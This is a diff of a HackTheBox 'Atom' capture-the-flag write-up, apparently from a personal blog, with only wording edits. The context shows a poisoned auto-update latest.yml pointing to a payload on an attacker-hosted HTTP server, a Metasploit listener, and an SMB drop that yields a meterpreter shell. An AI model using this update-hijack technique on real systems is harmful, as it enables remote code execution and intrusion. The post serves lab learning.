m3rcer/m3rcer.github.io/_posts/HackTheBox_Atom_Writeup/2021-05-08-HTB_Atom_Writeup.md

 ![Image](images/atom9.png)

 - Setup a listener on msfconsole to catch your shell using multi/handler.

-- generate the latest.yml file update: Replace the path and the hash.
+- Generate the latest.yml file update: Replace the path and the hash.

 ```
 version: 1.2.3
 path: http://10.10.14.52/d'payload.exe
 sha512: a/xp95BNvRKGxbxRZv+1LOEIs9uaSX6wGz6ip+RDX2XjNkTFVJbwIZ9T21SN40sq/78zYZmb9IxATX710s58Rg==
 ```

-- Start a server to host d'payload.exe using
-`sudo python -m SimpleHTTPServer 80`
+- Start a server to host d'payload.exe using: `sudo python -m SimpleHTTPServer 80`

 - Finally put the update file in one of the client folders on the share using smbclient.
 Wait for about 15-20 secs and let the update happen .
 You will recieve a meterpreter shell!